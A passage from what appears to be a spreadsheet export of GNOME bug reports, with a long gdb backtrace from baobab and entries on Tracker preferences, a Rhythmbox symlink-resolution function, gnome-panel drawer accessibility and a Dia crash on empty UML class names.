#10 0x000000000040aba7 in start_search (searchname=0x4137fa * 
    dir=0x94a660 /home/zero-one/.bcast) at baobab.c:207
	cursor = (GdkCursor *) 0x9f04d0
#11 0x00002ae7c5d490b9 in IA__g_closure_invoke (closure=0x9e0cf0 
    return_value=0x0 n_param_values=1 param_values=0x7fffe8d895a0 
    invocation_hint=0x7fffe8d89470) at gclosure.c:490
	marshal = (
    GClosureMarshal) 0x2ae7c5d55360 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#12 0x00002ae7c5d58731 in signal_emit_unlocked_R (node=0x57ec20 detail=0 
    instance=0x7e56e0 emission_return=0x0 
    instance_and_params=0x7fffe8d895a0) at gsignal.c:2440
	tmp = 
	handler = (Handler *) 0x958c90
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x7fffe8d89ad0 instance = 0x7e56e0 ihint = {
    signal_id = 100 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x57ebb0
	handler_list = (Handler *) 0x958c90
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 100
	max_sequential_handler_number = 1005
	return_value_altered = 1
#13 0x00002ae7c5d599e5 in IA__g_signal_emit_valist (instance=0x7e56e0 
    signal_id= detail=0 var_args=0x7fffe8d89820)
    at gsignal.c:2199
	_cvalue = 
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -388458324 v_long = 140737099897004 
    v_int64 = 140737099897004 v_double = 6.9533366154437314e-310 
    v_pointer = 0x7fffe8d898ac} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = -1010033831 
    v_long = 47174910745433 v_int64 = 47174910745433 
    v_double = 2.3307502744945517e-310 v_pointer = 0x2ae7c3cc1b59} {
    v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {
    v_int = 28 v_long = 28 v_int64 = 28 
    v_double = 1.3833838083554903e-322 v_pointer = 0x1c} {v_int = 5500368 
    v_long = 5500368 v_int64 = 5500368 v_double = 2.7175428682845256e-317 
    v_pointer = 0x53edd0} {v_int = -1010033703 v_long = 47174910745561 
    v_int64 = 47174910745561 v_double = 2.3307502745008757e-310 
    v_pointer = 0x2ae7c3cc1bd9}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 32 data = {{v_int = -980264443 
      v_uint = 3314702853 v_long = 47174940514821 v_ulong = 47174940514821 
      v_int64 = 47174940514821 v_uint64 = 47174940514821 
      v_float = -4683.25244 v_double = 2.3307517452977425e-310 
      v_pointer = 0x2ae7c5925a05} {v_int = -1051852539 v_uint = 3243114757 
      v_long = 737468475199324421 v_ulong = 737468475199324421 
      v_int64 = 737468475199324421 v_uint64 = 737468475199324421 
      v_float = -12.8752489 v_double = 2.2775301462870115e-259 
      v_pointer = 0xa3c03abc14e0105}}}
	error = 
	instance_and_params = (GValue *) 0x7fffe8d895a0
	stack_values = {{g_type = 5868160 data = {{v_int = 8279776 
        v_uint = 8279776 v_long = 8279776 v_ulong = 8279776 
        v_int64 = 8279776 v_uint64 = 8279776 v_float = 1.16024374e-38 
        v_double = 4.0907528768608529e-317 v_pointer = 0x7e56e0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0} {v_int = 20 v_uint = 20 v_long = 20 
        v_ulong = 20 v_int64 = 20 v_uint64 = 20 v_float = 2.80259693e-44 
        v_double = 9.8813129168249309e-323 v_pointer = 0x14}}} {
    g_type = 20 data = {{v_int = 5350240 v_uint = 5350240 
        v_long = 5350240 v_ulong = 5350240 v_int64 = 5350240 
        v_uint64 = 5350240 v_float = 7.4972831e-39 
        v_double = 2.6433697810056709e-317 v_pointer = 0x51a360} {
        v_int = 20 v_uint = 20 v_long = 20 v_ulong = 20 v_int64 = 20 
        v_uint64 = 20 v_float = 2.80259693e-44 
        v_double = 9.8813129168249309e-323 v_pointer = 0x14}}} {
    g_type = 47174944988406 data = {{v_int = 24 v_uint = 24 v_long = 24 
        v_ulong = 24 v_int64 = 24 v_uint64 = 24 v_float = 3.36311631e-44 
        v_double = 1.1857575500189917e-322 v_pointer = 0x18} {
        v_int = -388458704 v_uint = 3906508592 v_long = 140737099896624 
        v_ulong = 140737099896624 v_int64 = 140737099896624 
        v_uint64 = 140737099896624 v_float = -8.18256062e+24 
        v_double = 6.9533366154249569e-310 v_pointer = 0x7fffe8d89730}}} {
    g_type = 8204976 data = {{v_int = -966292770 v_uint = 3328674526 
        v_long = 47174954486494 v_ulong = 47174954486494 
        v_int64 = 47174954486494 v_uint64 = 47174954486494 
        v_float = -14818.7168 v_double = 2.3307524355901069e-310 
        v_pointer = 0x2ae7c6678ade} {v_int = 30 v_uint = 30 v_long = 30 
        v_ulong = 30 v_int64 = 30 v_uint64 = 30 v_float = 4.20389539e-44 
        v_double = 1.4821969375237396e-322 v_pointer = 0x1e}}} {
    g_type = 10533376 data = {{v_int = -388458832 v_uint = 3906508464 
        v_long = 140737099896496 v_ulong = 140737099896496 
        v_int64 = 140737099896496 v_uint64 = 140737099896496 
        v_float = -8.18248683e+24 v_double = 6.9533366154186328e-310 
        v_pointer = 0x7fffe8d896b0} {v_int = 5577472 v_uint = 5577472 
        v_long = 5577472 v_ulong = 5577472 v_int64 = 5577472 
        v_uint64 = 5577472 v_float = 7.81570295e-39 
        v_double = 2.755637305841469e-317 v_pointer = 0x551b00}}} {
    g_type = 5577472 data = {{v_int = 6175248 v_uint = 6175248 
        v_long = 6175248 v_ulong = 6175248 v_int64 = 6175248 
        v_uint64 = 6175248 v_float = 8.65336554e-39 
        v_double = 3.050977891349866e-317 v_pointer = 0x5e3a10} {
        v_int = 9034240 v_uint = 9034240 v_long = 9034240 
        v_ulong = 9034240 v_int64 = 9034240 v_uint64 = 9034240 
        v_float = 1.26596666e-38 v_double = 4.4635076202848232e-317 
        v_pointer = 0x89da00}}} {g_type = 6175584 data = {{
        v_int = -975931312 v_uint = 3319035984 v_long = 47174944847952 
        v_ulong = 47174944847952 v_int64 = 47174944847952 
        v_uint64 = 47174944847952 v_float = -6799.03906 
        v_double = 2.3307519593828591e-310 v_pointer = 0x2ae7c5d47850} {
        v_int = -1001388474 v_uint = 3293578822 v_long = 47174919390790 
        v_ulong = 47174919390790 v_int64 = 47174919390790 
        v_uint64 = 47174919390790 v_float = -832.098022 
        v_double = 2.3307507016319406e-310 v_pointer = 0x2ae7c4500646}}} {
    g_type = 4300731264 data = {{v_int = 8279776 v_uint = 8279776 
        v_long = 8279776 v_ulong = 8279776 v_int64 = 8279776 
        v_uint64 = 8279776 v_float = 1.16024374e-38 
        v_double = 4.0907528768608529e-317 v_pointer = 0x7e56e0} {
        v_int = 2 v_uint = 2 v_long = 2 v_ulong = 2 v_int64 = 2 
        v_uint64 = 2 v_float = 2.80259693e-45 
        v_double = 9.8813129168249309e-324 v_pointer = 0x2}}} {
    g_type = 47174920735199 data = {{v_int = -388458672 
        v_uint = 3906508624 v_long = 140737099896656 
        v_ulong = 140737099896656 v_int64 = 140737099896656 
        v_uint64 = 140737099896656 v_float = -8.18257907e+24 
        v_double = 6.9533366154265379e-310 v_pointer = 0x7fffe8d89750} {
        v_int = -388458832 v_uint = 3906508464 v_long = 140737099896496 
        v_ulong = 140737099896496 v_int64 = 140737099896496 
        v_uint64 = 140737099896496 v_float = -8.18248683e+24 
        v_double = 6.9533366154186328e-310 v_pointer = 0x7fffe8d896b0}}} {
    g_type = 0 data = {{v_int = 5497744 v_uint = 5497744 v_long = 5497744 
        v_ulong = 5497744 v_int64 = 5497744 v_uint64 = 5497744 
        v_float = 7.70398022e-39 v_double = 2.7162464400298381e-317 
        v_pointer = 0x53e390} {v_int = 5497744 v_uint = 5497744 
        v_long = 5497744 v_ulong = 5497744 v_int64 = 5497744 
        v_uint64 = 5497744 v_float = 7.70398022e-39 
        v_double = 2.7162464400298381e-317 v_pointer = 0x53e390}}} {
    g_type = 16708800 data = {{v_int = 5638016 v_uint = 5638016 
        v_long = 5638016 v_ulong = 5638016 v_int64 = 5638016 
        v_uint64 = 5638016 v_float = 7.90054316e-39 
        v_double = 2.7855500163032815e-317 v_pointer = 0x560780} {
        v_int = 5497744 v_uint = 5497744 v_long = 5497744 
        v_ulong = 5497744 v_int64 = 5497744 v_uint64 = 5497744 
        v_float = 7.70398022e-39 v_double = 2.7162464400298381e-317 
        v_pointer = 0x53e390}}} {g_type = 0 data = {{v_int = -980264652 
        v_uint = 3314702644 v_long = 47174940514612 
        v_ulong = 47174940514612 v_int64 = 47174940514612 
        v_uint64 = 47174940514612 v_float = -4683.15039 
        v_double = 2.3307517452874165e-310 v_pointer = 0x2ae7c5925934} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 196 data = {{v_int = 5577528 v_uint = 5577528 
        v_long = 5577528 v_ulong = 5577528 v_int64 = 5577528 
        v_uint64 = 5577528 v_float = 7.81578142e-39 
        v_double = 2.7556649735176362e-317 v_pointer = 0x551b38} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 6175248 data = {{v_int = -975917435 v_uint = 3319049861 
        v_long = 47174944861829 v_ulong = 47174944861829 
        v_int64 = 47174944861829 v_uint64 = 47174944861829 
        v_float = -6805.81494 v_double = 2.330751960068474e-310 
        v_pointer = 0x2ae7c5d4ae85} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 6175248 
        v_uint = 6175248 v_long = 6175248 v_ulong = 6175248 
        v_int64 = 6175248 v_uint64 = 6175248 v_float = 8.65336554e-39 
        v_double = 3.050977891349866e-317 v_pointer = 0x5e3a10} {
        v_int = -1000787110 v_uint = 3294180186 v_long = 47174919992154 
        v_ulong = 47174919992154 v_int64 = 47174919992154 
        v_uint64 = 47174919992154 v_float = -868.802368 
        v_double = 2.3307507313432699e-310 v_pointer = 0x2ae7c459335a}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0x7fffe8d895b8
	node = (SignalNode *) 0x57ec20
	i = 4
	n_params = 0
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#14 0x00002ae7c5d59bc3 in IA__g_signal_emit (instance=0x7fffe8d88fc0 
    signal_id=1 detail=3906506624) at gsignal.c:2243
	var_args = {{gp_offset = 24 fp_offset = 48 
    overflow_arg_area = 0x7fffe8d89900 reg_save_area = 0x7fffe8d89840}}
#15 0x00002ae7c459637a in IA__gtk_widget_activate (widget=0x7e56e0)
    at gtkwidget.c:3942
	__PRETTY_FUNCTION__ = IA__gtk_widget_activate
#16 0x00002ae7c44a5060 in IA__gtk_menu_shell_activate_item (
    menu_shell=0x5e3a10 menu_item=0x7e56e0 
    force_deactivate=) at gtkmenushell.c:1024
	slist = 
	shells = 
	__PRETTY_FUNCTION__ = IA__gtk_menu_shell_activate_item
#17 0x00002ae7c44a6510 in gtk_menu_shell_button_release (widget=0x5e3a10 
    event=0x821920) at gtkmenushell.c:630
	menu_shell = (GtkMenuShell *) 0x7fffe8d88fc0
	menu_item = (GtkWidget *) 0x7e56e0
	deactivate = 
	__PRETTY_FUNCTION__ = gtk_menu_shell_button_release
#18 0x00002ae7c44992fd in _gtk_marshal_BOOLEAN__BOXED (closure=0x5741a0 
    return_value=0x7fffe8d89b20 n_param_values= 
    param_values=0x7fffe8d89c10 invocation_hint= 
    marshal_data=0x2ae7c449e9d0) at gtkmarshalers.c:84
	data1 = (gpointer) 0x5e3a10
	data2 = (gpointer) 0x7fffe8d88f80
	v_return = 
	__PRETTY_FUNCTION__ = _gtk_marshal_BOOLEAN__BOXED
#19 0x00002ae7c5d490b9 in IA__g_closure_invoke (closure=0x5741a0 
    return_value=0x7fffe8d89b20 n_param_values=2 
    param_values=0x7fffe8d89c10 invocation_hint=0x7fffe8d89ae0)
    at gclosure.c:490
	marshal = (GClosureMarshal) 0x2ae7c5d47850 
	marshal_data = (gpointer) 0x160
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#20 0x00002ae7c5d588cf in signal_emit_unlocked_R (node=0x574210 detail=0 
    instance=0x5e3a10 emission_return=0x7fffe8d89e30 
    instance_and_params=0x7fffe8d89c10) at gsignal.c:2478
	tmp = 
	handler = 
	accumulator = (SignalAccumulator *) 0x566090
	emission = {next = 0x0 instance = 0x5e3a10 ihint = {signal_id = 44 
    detail = 0 run_type = G_SIGNAL_RUN_LAST} state = EMISSION_RUN 
  chain_type = 5809696}
	class_closure = (GClosure *) 0x5741a0
	handler_list = (Handler *) 0x0
	return_accu = (GValue *) 0x7fffe8d89b20
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 44
	max_sequential_handler_number = 1005
	return_value_altered = 0
#21 0x00002ae7c5d597ae in IA__g_signal_emit_valist (instance=0x5e3a10 
    signal_id= detail=0 var_args=0x7fffe8d89e90)
    at gsignal.c:2209
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0}}}
	error = 
	instance_and_params = (GValue *) 0x7fffe8d89c10
	stack_values = {{g_type = 5809696 data = {{v_int = 6175248 
        v_uint = 6175248 v_long = 6175248 v_ulong = 6175248 
        v_int64 = 6175248 v_uint64 = 6175248 v_float = 8.65336554e-39 
        v_double = 3.050977891349866e-317 v_pointer = 0x5e3a10} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 5717856 
    data = {{v_int = 8526112 v_uint = 8526112 v_long = 8526112 
        v_ulong = 8526112 v_int64 = 8526112 v_uint64 = 8526112 
        v_float = 1.19476277e-38 v_double = 4.2124590317948023e-317 
        v_pointer = 0x821920} {v_int = 134217728 v_uint = 134217728 
        v_long = 134217728 v_ulong = 134217728 v_int64 = 134217728 
        v_uint64 = 134217728 v_float = 3.85185989e-34 
        v_double = 6.631236846766476e-316 v_pointer = 0x8000000}}} {
    g_type = 5533696 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0} {v_int = 8526112 v_uint = 8526112 
        v_long = 8526112 v_ulong = 8526112 v_int64 = 8526112 
        v_uint64 = 8526112 v_float = 1.19476277e-38 
        v_double = 4.2124590317948023e-317 v_pointer = 0x821920}}} {
    g_type = 47174922764673 data = {{v_int = 17670656 v_uint = 17670656 
        v_long = 17670656 v_ulong = 17670656 v_int64 = 17670656 
        v_uint64 = 17670656 v_float = 2.60138392e-38 
        v_double = 8.7304640690784983e-317 v_pointer = 0x10da200} {
        v_int = -388456656 v_uint = 3906510640 v_long = 140737099898672 
        v_ulong = 140737099898672 v_int64 = 140737099898672 
        v_uint64 = 140737099898672 v_float = -8.18374121e+24 
        v_double = 6.9533366155261415e-310 v_pointer = 0x7fffe8d89f30}}} {
    g_type = 56730094 data = {{v_int = -997989540 v_uint = 3296977756 
        v_long = 47174922789724 v_ulong = 47174922789724 
        v_int64 = 47174922789724 v_uint64 = 47174922789724 
        v_float = -1055.10498 v_double = 2.3307508695615928e-310 
        v_pointer = 0x2ae7c483e35c} {v_int = 0 v_uint = 0 
        v_long = 12948557598294016 v_ulong = 12948557598294016 
        v_int64 = 12948557598294016 v_uint64 = 12948557598294016 
        v_float = 0 v_double = 8.3447272280130237e-308 
        v_pointer = 0x2e00a500000000}}} {g_type = 10305072 data = {{
        v_int = 17753136 v_uint = 17753136 v_long = 17753136 
        v_ulong = 17753136 v_int64 = 17753136 v_uint64 = 17753136 
        v_float = 2.62449974e-38 v_double = 8.7712146035474843e-317 
        v_pointer = 0x10ee430} {v_int = 8 v_uint = 8 v_long = 8 
        v_ulong = 8 v_int64 = 8 v_uint64 = 8 v_float = 1.12103877e-44 
        v_double = 3.9525251667299724e-323 v_pointer = 0x8}}} {g_type = 0 
    data = {{v_int = -968979495 v_uint = 3325987801 
        v_long = 47174951799769 v_ulong = 47174951799769 
        v_int64 = 47174951799769 v_uint64 = 47174951799769 
        v_float = -12194.9619 v_double = 2.3307523028482547e-310 
        v_pointer = 0x2ae7c63e8bd9} {v_int = 32 v_uint = 32 v_long = 32 
        v_ulong = 32 v_int64 = 32 v_uint64 = 32 v_float = 4.48415509e-44 
        v_double = 1.5810100666919889e-322 v_pointer = 0x20}}} {
    g_type = 5500368 data = {{v_int = 5497744 v_uint = 5497744 
        v_long = 5497744 v_ulong = 5497744 v_int64 = 5497744 
        v_uint64 = 5497744 v_float = 7.70398022e-39 
        v_double = 2.7162464400298381e-317 v_pointer = 0x53e390} {
        v_int = -980438343 v_uint = 3314528953 v_long = 47174940340921 
        v_ulong = 47174940340921 v_int64 = 47174940340921 
        v_uint64 = 47174940340921 v_float = -4598.34033 
        v_double = 2.3307517367059409e-310 v_pointer = 0x2ae7c58fb2b9}}} {
    g_type = 6 data = {{v_int = 93 v_uint = 93 v_long = 93 v_ulong = 93 
        v_int64 = 93 v_uint64 = 93 v_float = 1.30320757e-43 
        v_double = 4.5948105063235929e-322 v_pointer = 0x5d} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 140737099898176 data = {{v_int = 17666960 v_uint = 17666960 
        v_long = 17666960 v_ulong = 17666960 v_int64 = 17666960 
        v_uint64 = 17666960 v_float = 2.60034808e-38 
        v_double = 8.728638002451469e-317 v_pointer = 0x10d9390} {
        v_int = -968979495 v_uint = 3325987801 v_long = 47174951799769 
        v_ulong = 47174951799769 v_int64 = 47174951799769 
        v_uint64 = 47174951799769 v_float = -12194.9619 
        v_double = 2.3307523028482547e-310 v_pointer = 0x2ae7c63e8bd9}}} {
    g_type = 9976176 data = {{v_int = -969137939 v_uint = 3325829357 
        v_long = 47174951641325 v_ulong = 47174951641325 
        v_int64 = 47174951641325 v_uint64 = 47174951641325 
        v_float = -12040.2314 v_double = 2.330752295020081e-310 
        v_pointer = 0x2ae7c63c20ed} {v_int = 8526112 v_uint = 8526112 
        v_long = 8526112 v_ulong = 8526112 v_int64 = 8526112 
        v_uint64 = 8526112 v_float = 1.19476277e-38 
        v_double = 4.2124590317948023e-317 v_pointer = 0x821920}}} {
    g_type = 17668320 data = {{v_int = -388456656 v_uint = 3906510640 
        v_long = 140737099898672 v_ulong = 140737099898672 
        v_int64 = 140737099898672 v_uint64 = 140737099898672 
        v_float = -8.18374121e+24 v_double = 6.9533366155261415e-310 
        v_pointer = 0x7fffe8d89f30} {v_int = 5546176 v_uint = 5546176 
        v_long = 5546176 v_ulong = 5546176 v_int64 = 5546176 
        v_uint64 = 5546176 v_float = 7.77184791e-39 
        v_double = 2.7401750273892214e-317 v_pointer = 0x54a0c0}}} {
    g_type = 140737099898672 data = {{v_int = 17670656 v_uint = 17670656 
        v_long = 17670656 v_ulong = 17670656 v_int64 = 17670656 
        v_uint64 = 17670656 v_float = 2.60138392e-38 
        v_double = 8.7304640690784983e-317 v_pointer = 0x10da200} {
        v_int = 17670656 v_uint = 17670656 v_long = 17670656 
        v_ulong = 17670656 v_int64 = 17670656 v_uint64 = 17670656 
        v_float = 2.60138392e-38 v_double = 8.7304640690784983e-317 
        v_pointer = 0x10da200}}} {g_type = 47174944861829 data = {{
        v_int = 17670656 v_uint = 17670656 v_long = 17670656 
        v_ulong = 17670656 v_int64 = 17670656 v_uint64 = 17670656 
        v_float = 2.60138392e-38 v_double = 8.7304640690784983e-317 
        v_pointer = 0x10da200} {v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 1 v_uint64 = 1 v_float = 1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1}}} {
    g_type = 56730094 data = {{v_int = -998079838 v_uint = 3296887458 
        v_long = 47174922699426 v_ulong = 47174922699426 
        v_int64 = 47174922699426 v_uint64 = 47174922699426 
        v_float = -1044.08228 v_double = 2.3307508651002789e-310 
        v_pointer = 0x2ae7c48282a2} {v_int = 3 v_uint = 3 v_long = 3 
        v_ulong = 3 v_int64 = 3 v_uint64 = 3 v_float = 4.20389539e-45 
        v_double = 1.4821969375237396e-323 v_pointer = 0x3}}} {
    g_type = 47174951641325 data = {{v_int = 8301568 v_uint = 8301568 
        v_long = 8301568 v_ulong = 8301568 v_int64 = 8301568 
        v_uint64 = 8301568 v_float = 1.16329745e-38 
        v_double = 4.1015195554150254e-317 v_pointer = 0x7eac00} {
        v_int = -969137939 v_uint = 3325829357 v_long = 47174951641325 
        v_ulong = 47174951641325 v_int64 = 47174951641325 
        v_uint64 = 47174951641325 v_float = -12040.2314 
        v_double = 2.330752295020081e-310 v_pointer = 0x2ae7c63c20ed}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 20
	param_values = (GValue *) 0x7fffe8d89c28
	node = (SignalNode *) 0x574210
	i = 1
	n_params = 1
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#22 0x00002ae7c5d59bc3 in IA__g_signal_emit (instance=0x7fffe8d88fc0 
    signal_id=1 detail=3906506624) at gsignal.c:2243
	var_args = {{gp_offset = 32 fp_offset = 48 
    overflow_arg_area = 0x7fffe8d89f70 reg_save_area = 0x7fffe8d89eb0}}
#23 0x00002ae7c45926de in gtk_widget_event_internal (widget=0x5e3a10 
    event=0x821920) at gtkwidget.c:3911
	signal_num = 
	return_val = 0
#24 0x00002ae7c44929ce in IA__gtk_propagate_event (widget=0x5e3a10 
    event=0x821920) at gtkmain.c:2188
	tmp = (GtkWidget *) 0x5e3a10
	handled_event = 0
	__PRETTY_FUNCTION__ = IA__gtk_propagate_event
#25 0x00002ae7c4493a37 in IA__gtk_main_do_event (event=0x821920)
    at gtkmain.c:1422
	event_widget = (GtkWidget *) 0x7e56e0
	grab_widget = (GtkWidget *) 0x7e56e0
	window_group = (GtkWindowGroup *) 0x748ec0
	next_event = 
	rewritten_event = (GdkEvent *) 0x0
	tmp_list = 
	__PRETTY_FUNCTION__ = IA__gtk_main_do_event
#26 0x00002ae7c4829e9c in gdk_event_dispatch (source= 
    callback= user_data=)
    at gdkevents-x11.c:2320
	display = 
	event = (GdkEvent *) 0x821920
#27 0x00002ae7c63ce183 in IA__g_main_context_dispatch (context=0x556ad0)
    at gmain.c:2045
No locals.
#28 0x00002ae7c63d0fcd in g_main_context_iterate (context=0x556ad0 block=1 
    dispatch=1 self=) at gmain.c:2677
	got_ownership = 
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 
	allocated_nfds = 
	fds = (GPollFD *) 0x7f7070
	__PRETTY_FUNCTION__ = g_main_context_iterate
#29 0x00002ae7c63d12b6 in IA__g_main_loop_run (loop=0x7c1fe0) at gmain.c:2881
	got_ownership = 
	self = (GThread *) 0x522a40
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#30 0x00002ae7c4493d92 in IA__gtk_main () at gtkmain.c:1001
	tmp_list = (GList *) 0x0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x1
	loop = (GMainLoop *) 0x7c1fe0
#31 0x000000000040b33f in main (argc= 
    argv=0x7fffe8d8a2b8) at baobab.c:894
	program = (GnomeProgram *) 0x523810
	__PRETTY_FUNCTION__ = main
0x00002ae7c3cc295f	41	in waitpid.c</t>
  </si>
  <si>
    <t>thesaltydog</t>
  </si>
  <si>
    <t>quantum.analyst</t>
  </si>
  <si>
    <t>TRACKER-497674</t>
  </si>
  <si>
    <t>Preferences</t>
  </si>
  <si>
    <t>TRACKER</t>
  </si>
  <si>
    <t>Duplicated performance/resources preference</t>
  </si>
  <si>
    <t>What does Indexing speed do that the Resource Usage preferences aren't able to configure?</t>
  </si>
  <si>
    <t>jamie.mccrack</t>
  </si>
  <si>
    <t>RHYTHMBOX-163517</t>
  </si>
  <si>
    <t>RHYTHMBOX</t>
  </si>
  <si>
    <t>rb_uri_resolve_symlink buggy?</t>
  </si>
  <si>
    <t>I was looking for a way to follow symlinks with gnome-vfs and stumbled in this
function in rhythmbox... in the end it turned out that I didn't need to follow
symlnks for my stuff but before I forget I wanted to note that the function
seems buggy at a first look (or maybe I'm missing something obvious): it seems
to me that rb_uri_resolve_symlink just handles one level of symlinks but would
fail for link1-&gt;link2-&gt;realfile.
Here is the function that I was writing. It should at least compile but I never
tested it since while I was writing it I realized I didn't need it.
#define MAX_LINK_LEVEL 256
static char *
follow_symlink (const char *uri)
{
	gint link_count
	GnomeVFSFileInfo *info
	char *followed
	g_return_val_if_fail (uri != NULL NULL)
	info = gnome_vfs_file_info_new ()
	gnome_vfs_get_file_info (uri info GNOME_VFS_FILE_INFO_DEFAULT)
	if (info-&gt;type != GNOME_VFS_FILE_TYPE_SYMBOLIC_LINK)
		return g_strdup (uri)
	link_count = 0
	followed = g_strdup (uri)
	while (link_count &lt; MAX_LINK_LEVEL)
	{
		GnomeVFSURI *vfs_uri
		GnomeVFSURI *new_vfs_uri
		char *escaped_path
		vfs_uri = gnome_vfs_uri_new (followed)
		escaped_path = gnome_vfs_escape_path_string (info-&gt;symlink_name)
		new_vfs_uri = gnome_vfs_uri_resolve_relative (vfs_uri escaped_path)
		g_free (escaped_path)
		g_free (followed)
		followed = gnome_vfs_uri_to_string (new_vfs_uri GNOME_VFS_URI_HIDE_NONE) 
		link_count++
		gnome_vfs_uri_unref (new_vfs_uri)
		gnome_vfs_uri_unref (vfs_uri)
		gnome_vfs_file_info_clear (info)
		gnome_vfs_get_file_info (followed info GNOME_VFS_FILE_INFO_DEFAULT)
		if (info-&gt;type != GNOME_VFS_FILE_TYPE_SYMBOLIC_LINK)
		{
			gnome_vfs_file_info_unref (info)
			return followed
		}
	}
	/* Too many symlinks */
	gnome_vfs_file_info_unref (info)
	return NULL
}</t>
  </si>
  <si>
    <t>rhythmbox-maint</t>
  </si>
  <si>
    <t>paolo.borelli</t>
  </si>
  <si>
    <t>GNOME-PANEL-132854</t>
  </si>
  <si>
    <t>broken accessible feedback in panel drawer</t>
  </si>
  <si>
    <t>using gnome-panel from CVS HEAD 28 Jan.
-launch gnopernicus with speech feedback
-action a newly added drawer
gnopernicus does not report anything.
-&gt; expected: switched window open drawer for example
-press  to focus the empty drawer
gnopernicus reports:
right centered panel right centered panel panel
-&gt; expected: drawer panel for example
-focus the down-arrow button to which closes the drawer
gnopernicus reports:
push button available
-&gt; expected: close drawer push button available</t>
  </si>
  <si>
    <t>david.hawthorne</t>
  </si>
  <si>
    <t>DIA-127968</t>
  </si>
  <si>
    <t>Dia crashes on empty text in UML class</t>
  </si>
  <si>
    <t>(This bug report was generated by Bug Buddy 2.2.104)
Description of Problem:
Dia version 0.91 compiled 18:17:32 Jul 29 2003
Linux mylinux 2.4.20-20.7 #1 Mon Aug 18 14:56:30 EDT 2003 i686 unknown
Dia crashes when I remove text in an UML class and click apply.
Steps to reproduce the problem:
1. Create new UML class with default name 'Class'.
2. Double-click on class to open dialog.
3. Remove the text 'Class' and click apply.
Actual Results:
(dia:31176): Gtk-CRITICAL **: file gtkentry.c: line 3387
(gtk_entry_set_text): assertion `text != NULL' failed
Expected Results:
Should be allowed to give empty name to an object.
How often does this happen?
Always.
Additional Information:
None.
Debugging Information:
Backtrace was generated from '/usr/bin/dia'
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 1024 (LWP 31073)]
(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0x420b4769 in wait4 () from /lib/i686/libc.so.6
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4026cca3 in waitpid () from /lib/i686/libpthread.so.0
#3  0x400d1d65 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x4026af75 in pthread_sighandler () from /lib/i686/libpthread.so.0
#5  
#6  0x4002fb9e in dia_font_scaled_ascent () from /usr/lib/dia/libdia.so
#7  0x400581c1 in dia_renderer_set_size () from /usr/lib/dia/libdia.so
#8  0x40c86986 in g_module_check_init () from
/usr/lib/dia/libuml_objects.so
#9  0x400576df in dia_renderer_get_height_pixels () from
